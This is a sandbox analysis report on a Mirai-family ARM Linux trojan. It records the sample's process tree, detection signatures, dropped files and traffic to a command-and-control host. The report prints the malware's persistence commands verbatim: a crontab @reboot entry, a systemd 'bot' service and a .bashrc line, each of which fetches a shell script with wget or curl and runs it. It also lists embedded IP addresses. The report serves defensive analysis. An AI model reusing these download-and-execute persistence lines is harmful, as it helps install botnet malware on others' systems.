Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm7.elf

Overview

General Information

Sample name:arm7.elf
Analysis ID:1558944
MD5:90337fe04cae0de9874bcdf2e04426d1
SHA1:d7e3b11dbf5004e2bb4ad7cabcda8b907e822125
SHA256:329894206c4f4d8cea0da6ff75b98dbad800ae577acb1635b288afc61147f014
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558944
Start date and time:2024-11-20 01:00:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm7.elf
Detection:MAL
Classification:mal68.troj.linELF@0/4@3/0
  • VT rate limit hit for: arm7.elf
Command:/tmp/arm7.elf
PID:5851
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • arm7.elf (PID: 5851, Parent: 5776, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm7.elf
    • arm7.elf New Fork (PID: 5853, Parent: 5851)
      • arm7.elf New Fork (PID: 5855, Parent: 5853)
      • arm7.elf New Fork (PID: 5857, Parent: 5853)
      • arm7.elf New Fork (PID: 5859, Parent: 5853)
      • arm7.elf New Fork (PID: 5861, Parent: 5853)
      • sh (PID: 5861, Parent: 5853, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5867, Parent: 5861)
          • sh New Fork (PID: 5868, Parent: 5867)
          • crontab (PID: 5868, Parent: 5867, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5870, Parent: 5867)
          • chmod (PID: 5870, Parent: 5867, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5871, Parent: 5867)
          • sh (PID: 5871, Parent: 5867, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5872, Parent: 5867)
          • curl (PID: 5872, Parent: 5867, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 5877, Parent: 5867)
          • chmod (PID: 5877, Parent: 5867, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 5867, Parent: 5861, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 5869, Parent: 5861)
        • crontab (PID: 5869, Parent: 5861, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • arm7.elf New Fork (PID: 5878, Parent: 5853)
      • sh (PID: 5878, Parent: 5853, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 5883, Parent: 5878)
        • systemctl (PID: 5883, Parent: 5878, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 5885, Parent: 5884)
  • snapd-env-generator (PID: 5885, Parent: 5884, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm7.elfAvira: detected
Source: arm7.elfReversingLabs: Detection: 36%
Source: arm7.elfString: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv7l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdx
Source: arm7.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: arm7.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: /bin/curl (PID: 5872)Reads hosts file: /etc/hostsJump to behavior
Source: /tmp/arm7.elf (PID: 5851)Socket: 127.0.0.1:4161Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.E7p8s1.23.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv7l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdx
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal68.troj.linELF@0/4@3/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5868)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5869)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/arm7.elf (PID: 5853)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5869)File: /var/spool/cron/crontabs/tmp.E7p8s1Jump to behavior
Source: /usr/bin/crontab (PID: 5869)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/arm7.elf (PID: 5853)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 5872)Directory: /root/.curlrcJump to behavior
Source: /tmp/arm7.elf (PID: 5861)Shell command executed: /bin/sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/arm7.elf (PID: 5878)Shell command executed: /bin/sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 5870)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5877)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5883)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /tmp/arm7.elf (PID: 5851)Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 5872)Queries kernel information via 'uname': Jump to behavior
Source: arm7.elf, 5851.1.00005563894b8000.000055638960c000.rw-.sdmp, arm7.elf, 5853.1.00005563894b8000.000055638960c000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm7.elf, 5851.1.00005563894b8000.000055638960c000.rw-.sdmp, arm7.elf, 5853.1.00005563894b8000.000055638960c000.rw-.sdmpBinary or memory string: cU!/etc/qemu-binfmt/arm
Source: arm7.elf, 5851.1.00007ffdc751c000.00007ffdc753d000.rw-.sdmp, arm7.elf, 5853.1.00007ffdc751c000.00007ffdc753d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm7.elf, 5851.1.00007ffdc751c000.00007ffdc753d000.rw-.sdmp, arm7.elf, 5853.1.00007ffdc751c000.00007ffdc753d000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf
Source: arm7.elf, 5853.1.00007ffdc751c000.00007ffdc753d000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558944 Sample: arm7.elf Startdate: 20/11/2024 Architecture: LINUX Score: 68 47 host.zopz-api.com 172.111.38.48, 1290, 51014 INCERO-HVVCUS Reserved 2->47 49 daisy.ubuntu.com 2->49 53 Antivirus / Scanner detection for submitted sample 2->53 55 Multi AV Scanner detection for submitted file 2->55 10 arm7.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 arm7.elf 10->14         started        file6 45 /root/.bashrc, ASCII 14->45 dropped 61 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 14->61 18 arm7.elf sh 14->18         started        20 arm7.elf sh 14->20         started        22 arm7.elf 14->22         started        24 2 other processes 14->24 signatures7 process8 process9 26 sh crontab 18->26         started        30 sh sh 18->30         started        32 sh systemctl 20->32         started        file10 43 /var/spool/cron/crontabs/tmp.E7p8s1, ASCII 26->43 dropped 57 Sample tries to persist itself using cron 26->57 59 Executes the "crontab" command typically for achieving persistence 26->59 34 sh crontab 30->34         started        37 sh chmod 30->37         started        39 sh sh 30->39         started        41 2 other processes 30->41 signatures11 process12 signatures13 51 Executes the "crontab" command typically for achieving persistence 34->51

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
arm7.elf37%ReversingLabsLinux.Trojan.Mirai
arm7.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    host.zopz-api.com
    172.111.38.48
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://serverip/bins/bins.shtmp.E7p8s1.23.drfalse
        high
        http://serverip/bins/bins.sh;bot.service.13.drfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          172.111.38.48
          host.zopz-api.comReserved
          54540INCERO-HVVCUSfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          172.111.38.48mipsel.elfGet hashmaliciousUnknownBrowse
            i686.elfGet hashmaliciousUnknownBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              daisy.ubuntu.comkjsusa6.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              mmb9.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.24
              mmb2.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.25
              mmb1.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.24
              owari.m68k.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              owari.arm6.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              owari.arm7.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              owari.mips.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.24
              host.zopz-api.commipsel.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              i686.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              INCERO-HVVCUSmipsel.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              i686.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              cIhVfU4Bus.elfGet hashmaliciousMiraiBrowse
              • 172.110.25.149
              b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
              • 23.29.124.10
              https://auth-start-treizor.github.io/Get hashmaliciousUnknownBrowse
              • 23.227.176.186
              https://ambassadorlimo.comGet hashmaliciousUnknownBrowse
              • 198.99.138.98
              https://ambassadorlimo.com/Get hashmaliciousUnknownBrowse
              • 198.99.138.98
              https://link.edgepilot.com/s/58d339fb/mi_L0_elk0K48SZfFk6Q5A?u=http://www.ambassadorlimo.com/Get hashmaliciousUnknownBrowse
              • 198.99.138.98
              http://www.philmauer.com/Get hashmaliciousUnknownBrowse
              • 172.111.52.90
              http://loveevamk.lifeGet hashmaliciousUnknownBrowse
              • 172.111.38.73
              No context
              No context
              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File Type:ASCII text
              Category:dropped
              Size (bytes):76
              Entropy (8bit):3.7627880354948586
              Encrypted:false
              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
              MD5:D86A1F5765F37989EB0EC3837AD13ECC
              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
              Process:/tmp/arm7.elf
              File Type:ASCII text
              Category:dropped
              Size (bytes):178
              Entropy (8bit):4.358630015292201
              Encrypted:false
              SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
              MD5:C3685F292213652676F734AB36C060EE
              SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
              SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
              SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
              Process:/tmp/arm7.elf
              File Type:ASCII text
              Category:dropped
              Size (bytes):356
              Entropy (8bit):4.9110117370593995
              Encrypted:false
              SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
              MD5:F03C70CD4C61A1852F9E19B8FB0D639C
              SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
              SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
              SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
              Process:/usr/bin/crontab
              File Type:ASCII text
              Category:dropped
              Size (bytes):235
              Entropy (8bit):5.100342823415771
              Encrypted:false
              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLv8ZHGMQ5UYLtCFt3HY8jsHB:8QjHig8YeHLUHY8mB
              MD5:7AFEF51E1D6A676DAA9E0BCE51205E3F
              SHA1:0EAC4A09EB707322CBAB9C36BD6A783CDB66C20E
              SHA-256:862D93CBABE579883E89796FC365A78C7BEE7E3D29D2A564A02A791AF97E2FBC
              SHA-512:A82A267DB8CBB437E2F3B74163CAB7A5035193BB39D5E5354F966730315940CBCEDA143FC599AC8364EC6355962013D97D976A9C571AF945BA86803480FAA48E
              Malicious:true
              Reputation:low
              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 18:01:34 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
              File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.16176879166101
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:arm7.elf
              File size:99'492 bytes
              MD5:90337fe04cae0de9874bcdf2e04426d1
              SHA1:d7e3b11dbf5004e2bb4ad7cabcda8b907e822125
              SHA256:329894206c4f4d8cea0da6ff75b98dbad800ae577acb1635b288afc61147f014
              SHA512:2a210fe3de15b2581944b7e7b8970dbecf7d8bb7666e35032b602adaa37ec3bf38abc94d62595b8ef6b482243586cd2d5a7e18be94cfa2f3c1fd8dac73d50f68
              SSDEEP:1536:7UnXyNAN6sT3FtlqaXl92IaJoqdvIYDfmlRA2iwApwNaOY7n+8G:vNRotl19ZaJoqdvIsoApwNaOs+8G
              TLSH:5CA3FA46A9819F02D4D622FAFBAE414933536FB8E3FA7101DD206F5423C69DB0E77612
              File Content Preview:.ELF..............(.........4...........4. ...(........p.n.......... ... ............................o...o...............p...p...p......(t...............p...p...p..................Q.td..................................-...L..................@-.,@...0....S

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:ARM
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x8194
              Flags:0x4000002
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:5
              Section Header Offset:98772
              Section Header Size:40
              Number of Section Headers:18
              Header String Table Index:17
              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x80d40xd40x100x00x6AX004
              .textPROGBITS0x80f00xf00x155d40x00x6AX0016
              .finiPROGBITS0x1d6c40x156c40x100x00x6AX004
              .rodataPROGBITS0x1d6d80x156d80x17a30x00x2A008
              .ARM.extabPROGBITS0x1ee7c0x16e7c0x180x00x2A004
              .ARM.exidxARM_EXIDX0x1ee940x16e940x1200x00x82AL204
              .eh_framePROGBITS0x270000x170000x40x00x3WA004
              .tbssNOBITS0x270040x170040x80x00x403WAT004
              .init_arrayINIT_ARRAY0x270040x170040x40x00x3WA004
              .fini_arrayFINI_ARRAY0x270080x170080x40x00x3WA004
              .jcrPROGBITS0x2700c0x1700c0x40x00x3WA004
              .gotPROGBITS0x270100x170100xac0x40x3WA004
              .dataPROGBITS0x270bc0x170bc0x2480x00x3WA004
              .bssNOBITS0x273040x173040x71240x00x3WA004
              .commentPROGBITS0x00x173040xe260x00x0001
              .ARM.attributesARM_ATTRIBUTES0x00x1812a0x160x00x0001
              .shstrtabSTRTAB0x00x181400x910x00x0001
              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              EXIDX0x16e940x1ee940x1ee940x1200x1204.53570x4R 0x4.ARM.exidx
              LOAD0x00x80000x80000x16fb40x16fb46.13030x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
              LOAD0x170000x270000x270000x3040x74284.23860x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
              TLS0x170040x270040x270040x00x80.00000x4R 0x4.tbss
              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
              TimestampSource PortDest PortSource IPDest IP
              Nov 20, 2024 01:01:35.913738012 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:35.918627977 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:35.918685913 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:35.923738956 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:35.928596020 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:36.395116091 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:36.395188093 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:36.530791044 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:36.530920029 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:36.530920029 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:36.536062002 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:41.395808935 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:41.395860910 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:41.395970106 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:41.400746107 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:41.400796890 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:41.405608892 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:46.396688938 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:46.396744967 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:46.396781921 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:46.401663065 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:46.401710033 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:46.406578064 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:51.397710085 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:51.397794962 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:51.402793884 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:51.402839899 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:51.407665968 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:56.397881985 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:56.397974968 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:56.402899981 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:01:56.402940989 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:01:56.407825947 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:01.398689032 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:01.398789883 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:01.403683901 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:01.403734922 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:01.408600092 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:06.399027109 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:06.399164915 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:06.404033899 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:06.404083014 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:06.408909082 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:11.399543047 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:11.399651051 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:11.404582024 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:11.404635906 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:11.409595013 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:16.400772095 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:16.400885105 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:16.405916929 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:16.405971050 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:16.410846949 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:21.400799036 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:21.400935888 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:21.405860901 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:21.405982018 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:21.410949945 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:26.410423040 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:26.410885096 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:26.415802002 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:26.415947914 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:26.420887947 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:31.401403904 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:31.401582956 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:31.406529903 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:31.406631947 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:31.411490917 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:36.402008057 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:36.402133942 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:36.407624006 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:36.407686949 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:36.413266897 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:41.402807951 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:41.403100014 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:41.407979012 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:41.408049107 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:41.412909985 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:46.403655052 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:46.403815031 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:46.408703089 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:46.408770084 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:46.413676977 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:51.403980970 CET129051014172.111.38.48192.168.2.15
